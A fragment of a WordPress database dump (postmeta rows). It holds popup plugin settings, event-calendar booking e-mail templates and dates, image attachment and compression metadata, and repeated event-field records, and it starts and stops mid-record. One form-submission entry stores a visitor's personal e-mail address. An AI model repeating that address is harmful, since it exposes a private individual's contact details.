top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:6:\"center\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:13:\"default-theme\";}'),(140968,264623,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144550,265244,'mec_repeat_end',''),(144549,265244,'mec_repeat_end_at_occurrences',''),(140850,264846,'protect_children',''),(140851,264846,'popup_title','Our Spring Sale Has Started'),(140852,264846,'enabled','1'),(144562,265245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:613;s:6:\"height\";i:360;s:4:\"file\";s:24:\"2021/07/girl-eagle-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"girl-eagle-1-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"girl-eagle-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"girl-eagle-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"girl-eagle-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"girl-eagle-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"girl-eagle-1-300x360.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"girl-eagle-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144561,265245,'_wp_attached_file','2021/07/girl-eagle-1.jpg'),(144558,265244,'_edit_lock','1627431180:2'),(144559,265244,'_edit_last','2'),(144560,265244,'_thumbnail_id','265245'),(144557,265244,'protect_children',''),(144556,265244,'mec_color',''),(144555,265244,'mec_location_id','118'),(144554,265244,'mec_dont_show_map','0'),(143315,265116,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:756;s:6:\"height\";i:420;s:4:\"file\";s:45:\"2021/06/2021-May-ESC-Seminar-2-EXTENDED-3.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-3-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-3-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143320,265115,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:209211;s:12:\"smushed-size\";i:113073;s:15:\"savings-percent\";d:45.9500000000000028421709430404007434844970703125;}'),(143319,265115,'smush-info','The file was compressed from 204.31 KB to 110.42 KB saving 45.95 percent using WP-Optimize'),(143318,265115,'smush-complete','1'),(143316,265116,'_edit_lock','1622651301:2'),(143317,265115,'original-file','2021/06/2021-May-ESC-Seminar-2-EXTENDED-2-updraft-pre-smush-original.jpg'),(143328,265113,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:53492;s:12:\"smushed-size\";i:50750;s:15:\"savings-percent\";d:5.12999999999999989341858963598497211933135986328125;}');
INSERT INTO `wpcl_postmeta` VALUES (143327,265113,'smush-info','The file was compressed from 52.24 KB to 49.56 KB saving 5.13 percent using WP-Optimize'),(143326,265113,'smush-complete','1'),(143325,265113,'original-file','2021/06/2021-May-ESC-Seminar-2-EXTENDED-updraft-pre-smush-original.jpg'),(143324,265116,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:359688;s:12:\"smushed-size\";i:211746;s:15:\"savings-percent\";d:41.13000000000000255795384873636066913604736328125;}'),(143322,265116,'smush-complete','1'),(143323,265116,'smush-info','The file was compressed from 351.26 KB to 206.78 KB saving 41.13 percent using WP-Optimize'),(188062,268826,'smush-info','The file was compressed from 214.20 KB to 198.16 KB saving 7.49 percent using WP-Optimize'),(188063,268826,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:219342;s:12:\"smushed-size\";i:202915;s:15:\"savings-percent\";d:7.4900000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:219342;s:10:\"compressed\";i:202915;}s:6:\"medium\";a:2:{s:8:\"original\";i:5264;s:10:\"compressed\";i:5198;}s:5:\"large\";a:2:{s:8:\"original\";i:53471;s:10:\"compressed\";i:53471;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2379;s:10:\"compressed\";i:2313;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:30058;s:10:\"compressed\";i:30058;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:7941;s:10:\"compressed\";i:7875;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:22085;s:10:\"compressed\";i:22085;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:12736;s:10:\"compressed\";i:12736;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:8354;s:10:\"compressed\";i:8288;}s:8:\"tileview\";a:2:{s:8:\"original\";i:10490;s:10:\"compressed\";i:10490;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:112204;s:10:\"compressed\";i:112204;}}}'),(188060,268826,'original-file','2023/07/login-bk-8-updraft-pre-smush-original.jpg'),(188061,268826,'smush-complete','1'),(188058,268826,'_wp_attached_file','2023/07/login-bk-8.jpg'),(188059,268826,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1189;s:4:\"file\";s:22:\"2023/07/login-bk-8.jpg\";s:8:\"filesize\";i:219342;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"login-bk-8-317x196.jpg\";s:5:\"width\";i:317;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5264;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"login-bk-8-1024x634.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:634;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53471;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"login-bk-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2379;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"login-bk-8-768x476.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:476;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30058;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"login-bk-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7941;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:22:\"login-bk-8-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22085;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"login-bk-8-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12736;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"login-bk-8-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8354;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"login-bk-8-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10490;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"login-bk-8-1536x951.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:951;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112204;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188057,268824,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:41375;s:12:\"smushed-size\";i:40176;s:15:\"savings-percent\";d:2.899999999999999911182158029987476766109466552734375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:41375;s:10:\"compressed\";i:40176;}s:6:\"medium\";a:2:{s:8:\"original\";i:14884;s:10:\"compressed\";i:14884;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6929;s:10:\"compressed\";i:6929;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18621;s:10:\"compressed\";i:18621;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:30323;s:10:\"compressed\";i:30314;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:29074;s:10:\"compressed\";i:29050;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:20795;s:10:\"compressed\";i:20764;}s:8:\"tileview\";a:2:{s:8:\"original\";i:20400;s:10:\"compressed\";i:20272;}}}'),(144418,265241,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-26\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-26\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144417,265241,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144416,265241,'boldgrid_hide_page_title','0'),(144415,265241,'mec_display_cancellation_reason_in_single_page',''),(144414,265241,'mec_cancelled_reason',''),(144413,265241,'mec_moved_online_link',''),(188054,268824,'original-file','2023/07/init-esa-confirmation-blue-2-updraft-pre-smush-original.jpg'),(188055,268824,'smush-complete','1'),(188056,268824,'smush-info','The file was compressed from 40.41 KB to 39.23 KB saving 2.9 percent using WP-Optimize'),(143321,265116,'original-file','2021/06/2021-May-ESC-Seminar-2-EXTENDED-3-updraft-pre-smush-original.jpg'),(143314,265116,'_wp_attached_file','2021/06/2021-May-ESC-Seminar-2-EXTENDED-3.jpg'),(143313,265115,'_edit_lock','1622651059:2'),(143312,265115,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:501;s:6:\"height\";i:278;s:4:\"file\";s:45:\"2021/06/2021-May-ESC-Seminar-2-EXTENDED-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-2-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-2-300x278.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-2-474x278.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-2-300x278.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"2021-May-ESC-Seminar-2-EXTENDED-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143258,265096,'original-file','2021/05/child-beach-1-updraft-pre-smush-original.jpg'),(143257,265106,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:46197;s:12:\"smushed-size\";i:44954;s:15:\"savings-percent\";d:2.689999999999999946709294817992486059665679931640625;}'),(143256,265106,'smush-info','The file was compressed from 45.11 KB to 43.90 KB saving 2.69 percent using WP-Optimize'),(143255,265106,'smush-complete','1'),(143254,265106,'original-file','2021/06/father-child-1-updraft-pre-smush-original.jpg'),(143253,265105,'passster_protection_type','password'),(143252,265105,'passster_activate_protection',NULL),(143251,265105,'passster_activate_global_protection',NULL),(143172,265101,'_seq_num','19'),(143171,265101,'_form_id','46'),(143169,265101,'_field_426','Priest '),(143170,265101,'_field_427','charmefwoman@gmail.com'),(143271,265108,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:614;s:6:\"height\";i:351;s:4:\"file\";s:19:\"2021/05/phon-1e.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"phon-1e-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"phon-1e-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:19:\"phon-1e-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:19:\"phon-1e-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:19:\"phon-1e-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:19:\"phon-1e-300x351.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"phon-1e-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143270,265108,'_wp_attached_file','2021/05/phon-1e.jpg'),(143261,265096,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:46342;s:12:\"smushed-size\";i:45539;s:15:\"savings-percent\";d:1.729999999999999982236431605997495353221893310546875;}'),(143260,265096,'smush-info','The file was compressed from 45.26 KB to 44.47 KB saving 1.73 percent using WP-Optimize'),(140114,264782,'protect_children',''),(140115,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140116,264782,'_EventOrigin','events-calendar'),(140117,264782,'protect_children',''),(140118,264782,'protect_children',''),(140119,264782,'protect_children',''),(140120,264782,'protect_children',''),(140121,264782,'protect_children',''),(140122,264782,'protect_children',''),(140123,264782,'protect_children',''),(140124,264782,'protect_children',''),(140125,264782,'protect_children',''),(140126,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140158,264782,'_EventCurrencyPosition','prefix'),(140127,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140157,264782,'_EventCurrencySymbol',''),(140128,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140156,264782,'_EventDuration','3600'),(140159,264782,'_EventCost',''),(140129,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\